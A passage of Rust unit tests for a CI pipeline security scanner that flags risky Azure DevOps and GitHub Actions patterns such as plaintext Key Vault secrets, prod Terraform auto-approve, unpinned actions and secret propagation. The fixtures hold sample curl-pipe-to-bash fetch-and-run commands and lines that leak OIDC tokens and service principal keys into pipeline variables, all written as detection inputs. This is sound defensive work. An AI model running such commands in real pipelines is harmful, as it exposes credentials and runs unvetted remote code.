8528        let findings = secret_materialised_to_workspace_file(&g);
8529        assert_eq!(findings.len(), 1);
8530    }
8531
8532    #[test]
8533    fn echoing_secret_to_stdout_not_flagged_by_materialisation_rule() {
8534        let g = build_step_with_script("TF_TOKEN", "echo using $(TF_TOKEN)\nterraform init");
8535        let findings = secret_materialised_to_workspace_file(&g);
8536        assert!(
8537            findings.is_empty(),
8538            "stdout echo (no file sink) must not trip materialisation rule"
8539        );
8540    }
8541
8542    #[test]
8543    fn write_to_unrelated_path_not_flagged() {
8544        // No workspace-path keyword, no risky extension — should not fire.
8545        let script = "echo $(MY_SECRET) > /var/tmp/ignore.log";
8546        let g = build_step_with_script("MY_SECRET", script);
8547        let findings = secret_materialised_to_workspace_file(&g);
8548        assert!(findings.is_empty());
8549    }
8550
8551    // ── keyvault_secret_to_plaintext ─────────────────────────
8552
8553    #[test]
8554    fn keyvault_asplaintext_flagged() {
8555        let script = "$pass = Get-AzKeyVaultSecret -VaultName foo -Name bar -AsPlainText\n\
8556                      Write-Host done";
8557        let g = build_step_with_script("UNUSED", script);
8558        let findings = keyvault_secret_to_plaintext(&g);
8559        assert_eq!(findings.len(), 1);
8560        assert_eq!(findings[0].severity, Severity::Medium);
8561    }
8562
8563    #[test]
8564    fn keyvault_secretvaluetext_legacy_pattern_flagged() {
8565        let script = "$pwd = (Get-AzKeyVaultSecret -VaultName foo -Name bar).SecretValueText";
8566        let g = build_step_with_script("UNUSED", script);
8567        let findings = keyvault_secret_to_plaintext(&g);
8568        assert_eq!(findings.len(), 1);
8569    }
8570
8571    #[test]
8572    fn convertfrom_securestring_asplaintext_flagged() {
8573        let script = "$plain = ConvertFrom-SecureString $sec -AsPlainText";
8574        let g = build_step_with_script("UNUSED", script);
8575        let findings = keyvault_secret_to_plaintext(&g);
8576        assert_eq!(findings.len(), 1);
8577    }
8578
8579    #[test]
8580    fn keyvault_securestring_handling_not_flagged() {
8581        // Using the secret as SecureString (no -AsPlainText) is the safe pattern.
8582        let script = "$sec = Get-AzKeyVaultSecret -VaultName foo -Name bar\n\
8583                      $cred = New-Object PSCredential 'svc', $sec.SecretValue";
8584        let g = build_step_with_script("UNUSED", script);
8585        let findings = keyvault_secret_to_plaintext(&g);
8586        assert!(
8587            findings.is_empty(),
8588            "SecureString-only handling is the recommended pattern and must not fire"
8589        );
8590    }
8591
8592    // ── terraform_auto_approve_in_prod ──────────────────────
8593
8594    fn step_with_meta(g: &mut AuthorityGraph, name: &str, meta: &[(&str, &str)]) -> NodeId {
8595        let mut m = std::collections::HashMap::new();
8596        for (k, v) in meta {
8597            m.insert((*k).to_string(), (*v).to_string());
8598        }
8599        g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, m)
8600    }
8601
8602    #[test]
8603    fn terraform_auto_approve_against_prod_connection_fires() {
8604        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8605        step_with_meta(
8606            &mut g,
8607            "Terraform : Apply",
8608            &[
8609                (META_TERRAFORM_AUTO_APPROVE, "true"),
8610                (META_SERVICE_CONNECTION_NAME, "sharedservice-w365-prod-sc"),
8611            ],
8612        );
8613
8614        let findings = terraform_auto_approve_in_prod(&g);
8615        assert_eq!(findings.len(), 1);
8616        assert_eq!(findings[0].severity, Severity::Critical);
8617        assert_eq!(
8618            findings[0].category,
8619            FindingCategory::TerraformAutoApproveInProd
8620        );
8621        assert!(
8622            findings[0].message.contains("sharedservice-w365-prod-sc"),
8623            "message should name the connection, got: {}",
8624            findings[0].message
8625        );
8626    }
8627
8628    #[test]
8629    fn terraform_auto_approve_via_edge_to_service_connection_identity() {
8630        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8631        let step = step_with_meta(
8632            &mut g,
8633            "Terraform : Apply",
8634            &[(META_TERRAFORM_AUTO_APPROVE, "true")],
8635        );
8636        let mut id_meta = std::collections::HashMap::new();
8637        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
8638        let conn = g.add_node_with_metadata(
8639            NodeKind::Identity,
8640            "alz-infra-sc-prd-uks",
8641            TrustZone::FirstParty,
8642            id_meta,
8643        );
8644        g.add_edge(step, conn, EdgeKind::HasAccessTo);
8645
8646        let findings = terraform_auto_approve_in_prod(&g);
8647        assert_eq!(findings.len(), 1);
8648        assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
8649    }
8650
8651    #[test]
8652    fn terraform_auto_approve_with_env_gate_downgrades_to_medium() {
8653        // Per blue-team CC-4: env gate is a partial control (the gate's
8654        // approver list is invisible from YAML), so the finding stays
8655        // visible at Medium rather than disappearing entirely.
8656        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8657        step_with_meta(
8658            &mut g,
8659            "Terraform : Apply",
8660            &[
8661                (META_TERRAFORM_AUTO_APPROVE, "true"),
8662                (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
8663                (META_ENV_APPROVAL, "true"),
8664            ],
8665        );
8666
8667        let findings = terraform_auto_approve_in_prod(&g);
8668        assert_eq!(
8669            findings.len(),
8670            1,
8671            "env-gated apply must still emit a finding"
8672        );
8673        assert_eq!(
8674            findings[0].severity,
8675            Severity::Medium,
8676            "env-gated apply downgrades Critical → Medium (compensating control credit)"
8677        );
8678        assert!(findings[0]
8679            .message
8680            .contains("`environment:` binding present"));
8681    }
8682
8683    #[test]
8684    fn terraform_auto_approve_against_non_prod_does_not_fire() {
8685        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8686        step_with_meta(
8687            &mut g,
8688            "Terraform : Apply",
8689            &[
8690                (META_TERRAFORM_AUTO_APPROVE, "true"),
8691                (META_SERVICE_CONNECTION_NAME, "platform-dev-sc"),
8692            ],
8693        );
8694
8695        let findings = terraform_auto_approve_in_prod(&g);
8696        assert!(findings.is_empty(), "dev connection must not match prod");
8697    }
8698
8699    #[test]
8700    fn terraform_apply_without_auto_approve_does_not_fire() {
8701        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8702        step_with_meta(
8703            &mut g,
8704            "Terraform : Apply",
8705            &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
8706        );
8707
8708        let findings = terraform_auto_approve_in_prod(&g);
8709        assert!(findings.is_empty());
8710    }
8711
8712    #[test]
8713    fn looks_like_prod_connection_matches_real_world_names() {
8714        assert!(looks_like_prod_connection("sharedservice-w365-prod-sc"));
8715        assert!(looks_like_prod_connection("alz-infra-sc-prd"));
8716        assert!(looks_like_prod_connection("prod-tenant-arm"));
8717        assert!(looks_like_prod_connection("PROD"));
8718        assert!(looks_like_prod_connection("my_prod_arm"));
8719        // Negatives — substrings inside other words must not match
8720        assert!(!looks_like_prod_connection("approver-sc"));
8721        assert!(!looks_like_prod_connection("reproducer-sc"));
8722        assert!(!looks_like_prod_connection("dev-sc"));
8723        assert!(!looks_like_prod_connection("staging"));
8724    }
8725
8726    // ── addspn_with_inline_script ───────────────────────────
8727
8728    #[test]
8729    fn addspn_with_inline_script_fires_with_basic_body() {
8730        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8731        step_with_meta(
8732            &mut g,
8733            "ado : azure : login (federated)",
8734            &[
8735                (META_ADD_SPN_TO_ENV, "true"),
8736                (META_SCRIPT_BODY, "az account show --query id -o tsv"),
8737            ],
8738        );
8739
8740        let findings = addspn_with_inline_script(&g);
8741        assert_eq!(findings.len(), 1);
8742        assert_eq!(findings[0].severity, Severity::High);
8743        assert!(!findings[0]
8744            .message
8745            .contains("explicit token laundering detected"));
8746    }
8747
8748    #[test]
8749    fn addspn_with_inline_script_escalates_message_on_token_laundering() {
8750        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8751        step_with_meta(
8752            &mut g,
8753            "ado : azure : login (federated)",
8754            &[
8755                (META_ADD_SPN_TO_ENV, "true"),
8756                (
8757                    META_SCRIPT_BODY,
8758                    "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\"",
8759                ),
8760            ],
8761        );
8762
8763        let findings = addspn_with_inline_script(&g);
8764        assert_eq!(findings.len(), 1);
8765        assert!(
8766            findings[0]
8767                .message
8768                .contains("explicit token laundering detected"),
8769            "message should escalate, got: {}",
8770            findings[0].message
8771        );
8772    }
8773
8774    #[test]
8775    fn addspn_without_inline_script_does_not_fire() {
8776        // No META_SCRIPT_BODY → scriptPath form, not inline
8777        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8778        step_with_meta(
8779            &mut g,
8780            "AzureCLI scriptPath",
8781            &[(META_ADD_SPN_TO_ENV, "true")],
8782        );
8783
8784        let findings = addspn_with_inline_script(&g);
8785        assert!(findings.is_empty());
8786    }
8787
8788    #[test]
8789    fn inline_script_without_addspn_does_not_fire() {
8790        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8791        step_with_meta(
8792            &mut g,
8793            "az account show",
8794            &[(META_SCRIPT_BODY, "az account show")],
8795        );
8796
8797        let findings = addspn_with_inline_script(&g);
8798        assert!(findings.is_empty());
8799    }
8800
8801    #[test]
8802    fn script_launders_spn_token_recognises_known_markers() {
8803        assert!(script_launders_spn_token(
8804            "Write-Output \"##vso[task.setvariable variable=ARM_OIDC_TOKEN]$env:idToken\""
8805        ));
8806        assert!(script_launders_spn_token(
8807            "echo \"##vso[task.setvariable variable=X]$env:servicePrincipalKey\""
8808        ));
8809        // setvariable without token material → not laundering, just env mutation
8810        assert!(!script_launders_spn_token(
8811            "echo \"##vso[task.setvariable variable=X]hello\""
8812        ));
8813        // No setvariable at all
8814        assert!(!script_launders_spn_token("$env:idToken"));
8815    }
8816
8817    // ── parameter_interpolation_into_shell ──────────────────
8818
8819    fn graph_with_param(spec: ParamSpec, name: &str) -> AuthorityGraph {
8820        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
8821        g.parameters.insert(name.to_string(), spec);
8822        g
8823    }
8824
8825    #[test]
8826    fn parameter_interpolation_fires_on_free_form_string_in_inline_script() {
8827        let mut g = graph_with_param(
8828            ParamSpec {
8829                param_type: "string".into(),
8830                has_values_allowlist: false,
8831            },
8832            "appName",
8833        );
8834        step_with_meta(
8835            &mut g,
8836            "terraform workspace",
8837            &[(
8838                META_SCRIPT_BODY,
8839                "terraform workspace select -or-create ${{ parameters.appName }}",
8840            )],
8841        );
8842
8843        let findings = parameter_interpolation_into_shell(&g);
8844        assert_eq!(findings.len(), 1);
8845        assert_eq!(findings[0].severity, Severity::Medium);
8846        assert!(findings[0].message.contains("appName"));
8847    }
8848
8849    #[test]
8850    fn parameter_interpolation_with_values_allowlist_does_not_fire() {
8851        let mut g = graph_with_param(
8852            ParamSpec {
8853                param_type: "string".into(),
8854                has_values_allowlist: true,
8855            },
8856            "location",
8857        );
8858        step_with_meta(
8859            &mut g,
8860            "Terraform Plan",
8861            &[(
8862                META_SCRIPT_BODY,
8863                "terraform plan -var=\"location=${{ parameters.location }}\"",
8864            )],
8865        );
8866
8867        let findings = parameter_interpolation_into_shell(&g);
8868        assert!(
8869            findings.is_empty(),
8870            "values: allowlist must suppress the finding"
8871        );
8872    }
8873
8874    #[test]
8875    fn parameter_interpolation_default_type_is_treated_as_string() {
8876        let mut g = graph_with_param(
8877            ParamSpec {
8878                // ADO defaults missing `type:` to string — same risk
8879                param_type: "".into(),
8880                has_values_allowlist: false,
8881            },
8882            "appName",
8883        );
8884        step_with_meta(
8885            &mut g,
8886            "Terraform : Plan",
8887            &[(
8888                META_SCRIPT_BODY,
8889                "terraform plan -var \"appName=${{ parameters.appName }}\"",
8890            )],
8891        );
8892
8893        let findings = parameter_interpolation_into_shell(&g);
8894        assert_eq!(findings.len(), 1, "missing type: must default to string");
8895    }
8896
8897    #[test]
8898    fn parameter_interpolation_skips_non_string_params() {
8899        let mut g = graph_with_param(
8900            ParamSpec {
8901                param_type: "boolean".into(),
8902                has_values_allowlist: false,
8903            },
8904            "enabled",
8905        );
8906        step_with_meta(
8907            &mut g,
8908            "step",
8909            &[(META_SCRIPT_BODY, "echo ${{ parameters.enabled }}")],
8910        );
8911
8912        let findings = parameter_interpolation_into_shell(&g);
8913        assert!(findings.is_empty(), "boolean params can't carry shell");
8914    }
8915
8916    #[test]
8917    fn parameter_interpolation_no_spaces_form_also_matches() {
8918        let mut g = graph_with_param(
8919            ParamSpec {
8920                param_type: "string".into(),
8921                has_values_allowlist: false,
8922            },
8923            "x",
8924        );
8925        step_with_meta(
8926            &mut g,
8927            "step",
8928            &[(META_SCRIPT_BODY, "echo ${{parameters.x}}")],
8929        );
8930
8931        let findings = parameter_interpolation_into_shell(&g);
8932        assert_eq!(findings.len(), 1);
8933    }
8934
8935    #[test]
8936    fn parameter_interpolation_skips_step_without_script_body() {
8937        let mut g = graph_with_param(
8938            ParamSpec {
8939                param_type: "string".into(),
8940                has_values_allowlist: false,
8941            },
8942            "appName",
8943        );
8944        // Step has no META_SCRIPT_BODY (e.g. a typed task without an inline script)
8945        g.add_node(NodeKind::Step, "task-step", TrustZone::Untrusted);
8946
8947        let findings = parameter_interpolation_into_shell(&g);
8948        assert!(findings.is_empty());
8949    }
8950
8951    // ── runtime_script_fetched_from_floating_url ───────────────
8952
8953    fn step_with_body(body: &str) -> AuthorityGraph {
8954        let mut g = AuthorityGraph::new(source("ci.yml"));
8955        let id = g.add_node(NodeKind::Step, "install", TrustZone::FirstParty);
8956        if let Some(node) = g.nodes.get_mut(id) {
8957            node.metadata
8958                .insert(META_SCRIPT_BODY.into(), body.to_string());
8959        }
8960        g
8961    }
8962
8963    #[test]
8964    fn floating_curl_pipe_bash_master_is_flagged() {
8965        let g = step_with_body(
8966            "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/master/scripts/install.sh | bash",
8967        );
8968        let findings = runtime_script_fetched_from_floating_url(&g);
8969        assert_eq!(findings.len(), 1);
8970        assert_eq!(findings[0].severity, Severity::High);
8971        assert_eq!(
8972            findings[0].category,
8973            FindingCategory::RuntimeScriptFetchedFromFloatingUrl
8974        );
8975    }
8976
8977    #[test]
8978    fn floating_deno_run_main_is_flagged() {
8979        let g = step_with_body(
8980            "deno run https://raw.githubusercontent.com/denoland/deno/refs/heads/main/tools/verify_pr_title.js \"$PR_TITLE\"",
8981        );
8982        let findings = runtime_script_fetched_from_floating_url(&g);
8983        assert_eq!(findings.len(), 1);
8984    }
8985
8986    #[test]
8987    fn pinned_curl_url_with_tag_not_flagged() {
8988        let g = step_with_body(
8989            "curl -fsSL https://raw.githubusercontent.com/tilt-dev/tilt/v0.33.10/scripts/install.sh | bash",
8990        );
8991        let findings = runtime_script_fetched_from_floating_url(&g);
8992        assert!(findings.is_empty(), "tag-pinned URL must not fire");
8993    }
8994
8995    #[test]
8996    fn curl_without_pipe_to_shell_not_flagged() {
8997        // `curl -O` writes to disk; the script isn't executed inline.
8998        let g = step_with_body(
8999            "curl -sSLO https://raw.githubusercontent.com/rust-lang/rust/master/src/tools/linkchecker/linkcheck.sh",
9000        );
9001        let findings = runtime_script_fetched_from_floating_url(&g);
9002        assert!(findings.is_empty(), "download-only must not fire");
9003    }
9004
9005    #[test]
9006    fn bash_process_substitution_curl_main_is_flagged() {
9007        let g = step_with_body(
9008            "bash <(curl -s https://raw.githubusercontent.com/some/repo/main/install.sh)",
9009        );
9010        let findings = runtime_script_fetched_from_floating_url(&g);
9011        assert_eq!(findings.len(), 1);
9012    }
9013
9014    // ── pr_trigger_with_floating_action_ref ────────────────────
9015
9016    fn graph_with_trigger_and_action(trigger: &str, action: &str) -> AuthorityGraph {
9017        let mut g = AuthorityGraph::new(source("pr.yml"));
9018        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9019        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
9020        g
9021    }
9022
9023    #[test]
9024    fn pull_request_target_with_floating_main_action_flagged_critical() {
9025        let g = graph_with_trigger_and_action("pull_request_target", "actions/checkout@main");
9026        let findings = pr_trigger_with_floating_action_ref(&g);
9027        assert_eq!(findings.len(), 1);
9028        assert_eq!(findings[0].severity, Severity::Critical);
9029        assert_eq!(
9030            findings[0].category,
9031            FindingCategory::PrTriggerWithFloatingActionRef
9032        );
9033    }
9034
9035    #[test]
9036    fn pull_request_target_with_sha_pinned_action_not_flagged() {
9037        let g = graph_with_trigger_and_action(
9038            "pull_request_target",
9039            "denoland/setup-deno@667a34cdef165d8d2b2e98dde39547c9daac7282",
9040        );
9041        let findings = pr_trigger_with_floating_action_ref(&g);
9042        assert!(findings.is_empty());
9043    }
9044
9045    #[test]
9046    fn issue_comment_with_floating_action_flagged() {
9047        let g = graph_with_trigger_and_action("issue_comment", "foo/bar@v1");
9048        let findings = pr_trigger_with_floating_action_ref(&g);
9049        assert_eq!(findings.len(), 1);
9050    }
9051
9052    #[test]
9053    fn pull_request_only_does_not_trigger_critical_compound_rule() {
9054        // `pull_request` (without `_target`) is the safe trigger — no base
9055        // repo write. Rule 4 must not fire on it.
9056        let g = graph_with_trigger_and_action("pull_request", "foo/bar@main");
9057        let findings = pr_trigger_with_floating_action_ref(&g);
9058        assert!(
9059            findings.is_empty(),
9060            "pull_request alone must not produce a critical compound finding"
9061        );
9062    }
9063
9064    #[test]
9065    fn comma_separated_trigger_with_pull_request_target_flagged() {
9066        let g = graph_with_trigger_and_action(
9067            "pull_request_target,push,workflow_dispatch",
9068            "foo/bar@main",
9069        );
9070        let findings = pr_trigger_with_floating_action_ref(&g);
9071        assert_eq!(findings.len(), 1);
9072    }
9073
9074    // ── untrusted_api_response_to_env_sink ─────────────────────
9075
9076    fn graph_with_trigger_and_step_body(trigger: &str, body: &str) -> AuthorityGraph {
9077        let mut g = AuthorityGraph::new(source("consumer.yml"));
9078        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9079        let id = g.add_node(NodeKind::Step, "capture", TrustZone::FirstParty);
9080        if let Some(node) = g.nodes.get_mut(id) {
9081            node.metadata
9082                .insert(META_SCRIPT_BODY.into(), body.to_string());
9083        }
9084        g
9085    }
9086
9087    #[test]
9088    fn workflow_run_gh_pr_view_to_github_env_flagged() {
9089        let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json 'number' --jq '\"PR_NUMBER=\\(.number)\"' >> $GITHUB_ENV";
9090        let g = graph_with_trigger_and_step_body("workflow_run", body);
9091        let findings = untrusted_api_response_to_env_sink(&g);
9092        assert_eq!(findings.len(), 1);
9093        assert_eq!(findings[0].severity, Severity::High);
9094    }
9095
9096    #[test]
9097    fn workflow_run_without_env_sink_not_flagged() {
9098        let body = "gh pr view --repo \"$REPO\" \"$PR_BRANCH\" --json number";
9099        let g = graph_with_trigger_and_step_body("workflow_run", body);
9100        let findings = untrusted_api_response_to_env_sink(&g);
9101        assert!(findings.is_empty());
9102    }
9103
9104    #[test]
9105    fn push_trigger_writing_to_env_not_flagged() {
9106        // Trigger is not in scope (push isn't a cross-workflow trust boundary)
9107        let body = "gh pr view --json number --jq .number >> $GITHUB_ENV";
9108        let g = graph_with_trigger_and_step_body("push", body);
9109        let findings = untrusted_api_response_to_env_sink(&g);
9110        assert!(findings.is_empty());
9111    }
9112
9113    #[test]
9114    fn workflow_run_multiline_capture_then_write_flagged() {
9115        let body = "VAL=$(gh api repos/foo/bar/pulls/$PR --jq .head.ref)\necho \"BRANCH=$VAL\" >> $GITHUB_ENV";
9116        let g = graph_with_trigger_and_step_body("workflow_run", body);
9117        let findings = untrusted_api_response_to_env_sink(&g);
9118        assert_eq!(findings.len(), 1);
9119    }
9120
9121    // ── pr_build_pushes_image_with_floating_credentials ────────
9122
9123    fn graph_pr_with_login_action(trigger: &str, action: &str) -> AuthorityGraph {
9124        let mut g = AuthorityGraph::new(source("pr-build.yml"));
9125        g.metadata.insert(META_TRIGGER.into(), trigger.into());
9126        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
9127        g
9128    }
9129
9130    #[test]
9131    fn pr_with_floating_login_to_gar_flagged() {
9132        let g = graph_pr_with_login_action(
9133            "pull_request",
9134            "grafana/shared-workflows/actions/login-to-gar@main",
9135        );
9136        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9137        assert_eq!(findings.len(), 1);
9138        assert_eq!(findings[0].severity, Severity::High);
9139        assert_eq!(
9140            findings[0].category,
9141            FindingCategory::PrBuildPushesImageWithFloatingCredentials
9142        );
9143    }
9144
9145    #[test]
9146    fn pr_with_floating_docker_login_action_flagged() {
9147        let g = graph_pr_with_login_action("pull_request", "docker/login-action@v3");
9148        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9149        assert_eq!(findings.len(), 1);
9150    }
9151
9152    #[test]
9153    fn pr_with_sha_pinned_docker_login_not_flagged() {
9154        let g = graph_pr_with_login_action(
9155            "pull_request",
9156            "docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d",
9157        );
9158        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9159        assert!(findings.is_empty());
9160    }
9161
9162    #[test]
9163    fn push_trigger_with_floating_login_action_not_flagged() {
9164        // Outside PR context — different rule (unpinned_action) covers it.
9165        let g = graph_pr_with_login_action("push", "docker/login-action@v3");
9166        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9167        assert!(findings.is_empty());
9168    }
9169
9170    #[test]
9171    fn pr_with_unrelated_unpinned_action_not_flagged() {
9172        // Rule scopes itself to registry-login actions only; generic actions
9173        // are covered by `unpinned_action` and `pr_trigger_with_floating_action_ref`.
9174        let g = graph_pr_with_login_action("pull_request", "actions/checkout@v4");
9175        let findings = pr_build_pushes_image_with_floating_credentials(&g);
9176        assert!(findings.is_empty());
9177    }
9178
9179    // ── unpinned_action severity tiering ─────────────────────────
9180
9181    #[test]
9182    fn unpinned_action_well_known_first_party_is_medium() {
9183        // `actions/checkout@v4` — owner is the GitHub-maintained `actions`
9184        // org. The supply-chain surface is real but operationally narrow,
9185        // so the rule emits Medium rather than the default High.
9186        let mut g = AuthorityGraph::new(source("ci.yml"));
9187        g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
9188
9189        let findings = unpinned_action(&g);
9190        assert_eq!(findings.len(), 1);
9191        assert_eq!(findings[0].severity, Severity::Medium);
9192        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9193    }
9194
9195    #[test]
9196    fn unpinned_action_same_repo_composite_is_info() {
9197        // `./.github/actions/setup` — same-repo composite action. No
9198        // external supply-chain surface, so the rule emits Info as a
9199        // hygiene-only signal rather than a security finding.
9200        let mut g = AuthorityGraph::new(source("ci.yml"));
9201        g.add_node(
9202            NodeKind::Image,
9203            "./.github/actions/setup",
9204            TrustZone::FirstParty,
9205        );
9206
9207        let findings = unpinned_action(&g);
9208        assert_eq!(findings.len(), 1);
9209        assert_eq!(findings[0].severity, Severity::Info);
9210        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9211    }
9212
9213    #[test]
9214    fn unpinned_action_unknown_owner_is_high() {
9215        // `random-org/foo@v1` — unknown owner, full unbounded supply-chain
9216        // surface. This is the case the rule was originally designed for
9217        // and the only severity tier that still emits at High.
9218        let mut g = AuthorityGraph::new(source("ci.yml"));
9219        g.add_node(NodeKind::Image, "random-org/foo@v1", TrustZone::Untrusted);
9220
9221        let findings = unpinned_action(&g);
9222        assert_eq!(findings.len(), 1);
9223        assert_eq!(findings[0].severity, Severity::High);
9224        assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
9225    }
9226
9227    #[test]
9228    fn unpinned_action_self_hosted_runner_label_not_flagged() {
9229        // Self-hosted runner labels are FirstParty Image nodes too — but
9230        // they aren't action references and have no @version to pin. The
9231        // rule must skip them (META_SELF_HOSTED is the marker).
9232        let mut g = AuthorityGraph::new(source("ci.yml"));
9233        let mut meta = std::collections::HashMap::new();
9234        meta.insert(META_SELF_HOSTED.into(), "true".into());
9235        g.add_node_with_metadata(NodeKind::Image, "self-hosted", TrustZone::FirstParty, meta);
9236
9237        let findings = unpinned_action(&g);
9238        assert!(
9239            findings.is_empty(),
9240            "self-hosted runner labels must not be flagged as unpinned actions: {findings:#?}"
9241        );
9242    }
9243
9244    // ── authority_propagation clustering ─────────────────────────
9245
9246    #[test]
9247    fn authority_propagation_clusters_one_secret_to_three_sinks() {
9248        // One secret, three different untrusted sinks reached via separate
9249        // propagation paths. After clustering, the rule must emit ONE
9250        // finding listing all three sinks in `nodes_involved`.
9251        let mut g = AuthorityGraph::new(source("ci.yml"));
9252        let secret = g.add_node(NodeKind::Secret, "GITHUB_TOKEN", TrustZone::FirstParty);
9253        let trampoline = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
9254        let sink_a = g.add_node(NodeKind::Step, "deploy[0]", TrustZone::Untrusted);
9255        let sink_b = g.add_node(NodeKind::Step, "deploy[1]", TrustZone::Untrusted);
9256        let sink_c = g.add_node(NodeKind::Step, "deploy[2]", TrustZone::Untrusted);
9257        g.add_edge(trampoline, secret, EdgeKind::HasAccessTo);
9258        g.add_edge(trampoline, sink_a, EdgeKind::DelegatesTo);
9259        g.add_edge(trampoline, sink_b, EdgeKind::DelegatesTo);
9260        g.add_edge(trampoline, sink_c, EdgeKind::DelegatesTo);
9261
9262        let findings = authority_propagation(&g, 4);
9263        assert_eq!(
9264            findings.len(),
9265            1,
9266            "three propagation paths from one secret must collapse to one finding, got: {findings:#?}"
9267        );
9268        let f = &findings[0];
9269        assert_eq!(f.category, FindingCategory::AuthorityPropagation);
9270        assert_eq!(f.severity, Severity::Critical);
9271        // [source, sink_a, sink_b, sink_c] — order preserved by insertion.
9272        assert_eq!(f.nodes_involved.len(), 4);
9273        assert_eq!(f.nodes_involved[0], secret);
9274        assert!(f.nodes_involved.contains(&sink_a));
9275        assert!(f.nodes_involved.contains(&sink_b));
9276        assert!(f.nodes_involved.contains(&sink_c));
9277        assert!(
9278            f.message.contains("3 sinks")
9279                || f.message.contains("deploy[0]") && f.message.contains("deploy[2]"),
9280            "cluster message must mention the multiple sinks: {}",
9281            f.message
9282        );
9283    }
9284
9285    #[test]
9286    fn authority_propagation_does_not_cluster_separate_secrets() {
9287        // Three independent secrets, each reaching one sink. The clustering
9288        // is keyed on the source node, so each secret's path becomes its own
9289        // finding — three findings total, not one.
9290        let mut g = AuthorityGraph::new(source("ci.yml"));
9291        let s1 = g.add_node(NodeKind::Secret, "TOKEN_A", TrustZone::FirstParty);
9292        let s2 = g.add_node(NodeKind::Secret, "TOKEN_B", TrustZone::FirstParty);
9293        let s3 = g.add_node(NodeKind::Secret, "TOKEN_C", TrustZone::FirstParty);
9294        let step1 = g.add_node(NodeKind::Step, "step_a", TrustZone::FirstParty);
9295        let step2 = g.add_node(NodeKind::Step, "step_b", TrustZone::FirstParty);
9296        let step3 = g.add_node(NodeKind::Step, "step_c", TrustZone::FirstParty);
9297        let sink1 = g.add_node(NodeKind::Step, "sink_a", TrustZone::Untrusted);
9298        let sink2 = g.add_node(NodeKind::Step, "sink_b", TrustZone::Untrusted);
9299        let sink3 = g.add_node(NodeKind::Step, "sink_c", TrustZone::Untrusted);
9300        g.add_edge(step1, s1, EdgeKind::HasAccessTo);
9301        g.add_edge(step1, sink1, EdgeKind::DelegatesTo);
9302        g.add_edge(step2, s2, EdgeKind::HasAccessTo);
9303        g.add_edge(step2, sink2, EdgeKind::DelegatesTo);
9304        g.add_edge(step3, s3, EdgeKind::HasAccessTo);
9305        g.add_edge(step3, sink3, EdgeKind::DelegatesTo);
9306
9307        let findings = authority_propagation(&g, 4);
9308        assert_eq!(
9309            findings.len(),
9310            3,
9311            "one finding per distinct source secret, got: {findings:#?}"
9312        );
9313        let sources: std::collections::HashSet<_> =
9314            findings.iter().map(|f| f.nodes_involved[0]).collect();
9315        assert!(sources.contains(&s1));
9316        assert!(sources.contains(&s2));
9317        assert!(sources.contains(&s3));
9318    }
9319
9320    // ── secret_via_env_gate_to_untrusted_consumer ──────────────────────
9321
9322    /// Build a graph with one job containing a configurable sequence of
9323    /// steps. Each tuple is (name, trust_zone, writes_env_gate, reads_env,
9324    /// secret_to_link). Returns the graph plus the assigned NodeIds in
9325    /// declaration order so tests can assert on specific nodes.
9326    fn job_with_steps(
9327        job: &str,
9328        steps: &[(&str, TrustZone, bool, bool, Option<&str>)],
9329    ) -> (AuthorityGraph, Vec<NodeId>) {
9330        let mut g = AuthorityGraph::new(source("ci.yml"));
9331        let mut secret_ids: std::collections::HashMap<String, NodeId> =
9332            std::collections::HashMap::new();
9333        let mut step_ids = Vec::new();
9334        for (name, zone, writes, reads, secret) in steps {
9335            let mut meta = std::collections::HashMap::new();
9336            meta.insert(META_JOB_NAME.into(), job.into());
9337            if *writes {
9338                meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
9339            }
9340            if *reads {
9341                meta.insert(META_READS_ENV.into(), "true".into());
9342            }
9343            let id = g.add_node_with_metadata(NodeKind::Step, *name, *zone, meta);
9344            if let Some(sname) = secret {
9345                let secret_id = *secret_ids
9346                    .entry((*sname).to_string())
9347                    .or_insert_with(|| g.add_node(NodeKind::Secret, *sname, TrustZone::FirstParty));
9348                g.add_edge(id, secret_id, EdgeKind::HasAccessTo);
9349            }
9350            step_ids.push(id);
9351        }
9352        (g, step_ids)
9353    }
9354
9355    #[test]
9356    fn env_gate_writer_then_untrusted_reader_fires() {
9357        let (g, _ids) = job_with_steps(
9358            "build",
9359            &[
9360                (
9361                    "setup",
9362                    TrustZone::FirstParty,
9363                    true,
9364                    false,
9365                    Some("CLOUD_KEY"),
9366                ),
9367                ("deploy", TrustZone::Untrusted, false, true, None),
9368            ],
9369        );
9370        let findings = secret_via_env_gate_to_untrusted_consumer(&g);
9371        assert_eq!(findings.len(), 1, "writer + untrusted reader must fire");
9372        assert_eq!(findings[0].severity, Severity::Critical);
9373        assert!(
9374            findings[0].message.contains("CLOUD_KEY"),
9375            "message must name the laundered secret"
9376        );
9377        assert!(
